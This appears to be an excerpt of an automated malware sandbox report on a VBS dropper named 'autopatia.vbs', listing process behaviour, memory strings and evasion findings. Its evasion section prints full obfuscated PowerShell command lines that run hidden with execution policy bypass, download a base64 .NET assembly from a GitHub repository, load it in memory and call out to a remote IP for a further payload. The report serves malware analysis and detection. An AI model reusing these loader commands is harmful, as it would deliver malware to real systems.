Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1747 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1558 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3651 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6083 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep count: 3651 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep count: 6083 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -19369081277395017s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.dr Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: autopatia.vbs.4.dr Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 00000007.00000003.1861150433.00000142CF135000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885212759.00000142CF53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885296181.00000142CEB81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1885405003.00000142CF331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967958264.000002004D5A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967788286.000002004D7AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1941882840.000002004D3A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1967867337.000002004D1A1000.00000004.00000020.00020000.00000000.sdmp, autopatia.vbs.4.dr Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn/M
Source: wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: powershell.exe, 00000003.00000002.2203709649.0000022A9B7D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000007.00000003.1861830222.00000142CF083000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1861339177.00000142CF07D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942046045.000002004D2ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1942507199.000002004D2F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnujfsjysndxjsid0gjysnuuxljysnahr0cccrj3m6ly8nkydyyscrj3cnkycuz2l0accrj3unkydidxnlcmnvbnrlbnqnkycuy28nkydtl05vrgv0zwn0t24vtm9ezxqnkydljysnyycrj3rpbi9yjysnzwzzl2hlywrzlycrj20nkydhaw4vrgv0ywhob3rolscrj1yudhgnkyd0uuxloybsmwxiyxnlnjrdbycrj24nkyd0zw50id0gke5ldy1pymonkydly3qgu3lzdgunkydtlk5ljysndccrjy4nkydxzscrj2jdjysnbgknkydlbnqplkrvdycrj25sb2fkjysnu3ryaw4nkydnjysnkfinkycxbhvyjysnbck7jysnifixbgjpbicrj2fyescrj0mnkydvbnrlbnqnkycgjysnpsbbu3lzdccrj2vtlicrj0nvbnzlcnrdojpgcicrj29tqicrj2fzzty0u3ryjysnaw4nkydnkfixbgjhc2u2nccrj0nvbnqnkydlbicrj3qpjysnoybsjysnmwwnkydhc3mnkydlbwinkydsesa9iftszwynkydsjysnzwn0aw9ulkenkydzjysnc2unkydtymx5xto6tccrj29hzcgnkydsmwxiaw5hjysncnldb250jysnzw50ktsgjysnwycrj2rubglijysnlklpjysnlkgnkydvbwvdjysnojonkydwqukozhprdhh0licrj0dgq1jslzankyc1nc8zjysnns4znc4nkyc1ljinkyc3ly86chr0accrj2r6aycrjywgzhprjysnmwr6aycrjywgjysnzhprjysnqzprjysnc2gnkydqcm9ncicrj2ftrgf0ywtzagr6aywgzhpryxv0b3ankydhdglhzccrj3prlccrjybkemsnkydszwcnkydbc21keicrj2ssigqnkyd6a2qnkyd6aycrjyxkjysnemtkjysnemspjyktukvqtefdzsagkftjaefyxtewmctby2hbcl0xmjirw2noqxjdmta3ksxby2hbcl0zncatukvqtefdzsana3nojyxby2hbcl05mi1dukvwbefdzsagkftjaefyxtgyk1tjaefyxtq5k1tjaefyxtewocksw2noqxjdmzyglvjfuexbq2unuuxljyxby2hbcl0zosl8icyoichbc3rysu5nxsr2zxjct1nluhjlzkvsrw5jzslbmswzxssnecctak9jbicnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('r1l'+'url = '+'qle'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/nodetecton/nodet'+'e'+'c'+'ton/r'+'efs/heads/'+'m'+'ain/detahnoth-'+'v.tx'+'tqle; r1lbase64co'+'n'+'tent = (new-obj'+'ect syste'+'m.ne'+'t'+'.'+'we'+'bc'+'li'+'ent).dow'+'nload'+'strin'+'g'+'(r'+'1lur'+'l);'+' r1lbin'+'ary'+'c'+'ontent'+' '+'= [syst'+'em.'+'convert]::fr'+'omb'+'ase64str'+'in'+'g(r1lbase64'+'cont'+'en'+'t)'+'; r'+'1l'+'ass'+'emb'+'ly = [ref'+'l'+'ection.a'+'s'+'se'+'mbly]::l'+'oad('+'r1lbina'+'rycont'+'ent); '+'['+'dnlib'+'.io'+'.h'+'ome]'+'::'+'vai(dzktxt.'+'gfcrr/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'c:k'+'sh'+'progr'+'amdatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'reg'+'asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-replace ([char]100+[char]122+[char]107),[char]34 -replace 'ksh',[char]92-creplace ([char]82+[char]49+[char]108),[char]36 -replace'qle',[char]39)| &( ([string]$verbosepreference)[1,3]+'x'-join'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnujfsjysndxjsid0gjysnuuxljysnahr0cccrj3m6ly8nkydyyscrj3cnkycuz2l0accrj3unkydidxnlcmnvbnrlbnqnkycuy28nkydtl05vrgv0zwn0t24vtm9ezxqnkydljysnyycrj3rpbi9yjysnzwzzl2hlywrzlycrj20nkydhaw4vrgv0ywhob3rolscrj1yudhgnkyd0uuxloybsmwxiyxnlnjrdbycrj24nkyd0zw50id0gke5ldy1pymonkydly3qgu3lzdgunkydtlk5ljysndccrjy4nkydxzscrj2jdjysnbgknkydlbnqplkrvdycrj25sb2fkjysnu3ryaw4nkydnjysnkfinkycxbhvyjysnbck7jysnifixbgjpbicrj2fyescrj0mnkydvbnrlbnqnkycgjysnpsbbu3lzdccrj2vtlicrj0nvbnzlcnrdojpgcicrj29tqicrj2fzzty0u3ryjysnaw4nkydnkfixbgjhc2u2nccrj0nvbnqnkydlbicrj3qpjysnoybsjysnmwwnkydhc3mnkydlbwinkydsesa9iftszwynkydsjysnzwn0aw9ulkenkydzjysnc2unkydtymx5xto6tccrj29hzcgnkydsmwxiaw5hjysncnldb250jysnzw50ktsgjysnwycrj2rubglijysnlklpjysnlkgnkydvbwvdjysnojonkydwqukozhprdhh0licrj0dgq1jslzankyc1nc8zjysnns4znc4nkyc1ljinkyc3ly86chr0accrj2r6aycrjywgzhprjysnmwr6aycrjywgjysnzhprjysnqzprjysnc2gnkydqcm9ncicrj2ftrgf0ywtzagr6aywgzhpryxv0b3ankydhdglhzccrj3prlccrjybkemsnkydszwcnkydbc21keicrj2ssigqnkyd6a2qnkyd6aycrjyxkjysnemtkjysnemspjyktukvqtefdzsagkftjaefyxtewmctby2hbcl0xmjirw2noqxjdmta3ksxby2hbcl0zncatukvqtefdzsana3nojyxby2hbcl05mi1dukvwbefdzsagkftjaefyxtgyk1tjaefyxtq5k1tjaefyxtewocksw2noqxjdmzyglvjfuexbq2unuuxljyxby2hbcl0zosl8icyoichbc3rysu5nxsr2zxjct1nluhjlzkvsrw5jzslbmswzxssnecctak9jbicnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('r1l'+'url = '+'qle'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/nodetecton/nodet'+'e'+'c'+'ton/r'+'efs/heads/'+'m'+'ain/detahnoth-'+'v.tx'+'tqle; r1lbase64co'+'n'+'tent = (new-obj'+'ect syste'+'m.ne'+'t'+'.'+'we'+'bc'+'li'+'ent).dow'+'nload'+'strin'+'g'+'(r'+'1lur'+'l);'+' r1lbin'+'ary'+'c'+'ontent'+' '+'= [syst'+'em.'+'convert]::fr'+'omb'+'ase64str'+'in'+'g(r1lbase64'+'cont'+'en'+'t)'+'; r'+'1l'+'ass'+'emb'+'ly = [ref'+'l'+'ection.a'+'s'+'se'+'mbly]::l'+'oad('+'r1lbina'+'rycont'+'ent); '+'['+'dnlib'+'.io'+'.h'+'ome]'+'::'+'vai(dzktxt.'+'gfcrr/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'c:k'+'sh'+'progr'+'amdatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'reg'+'asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-replace ([char]100+[char]122+[char]107),[char]34 -replace 'ksh',[char]92-creplace ([char]82+[char]49+[char]108),[char]36 -replace'qle',[char]39)| &( ([string]$verbosepreference)[1,3]+'x'-join'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
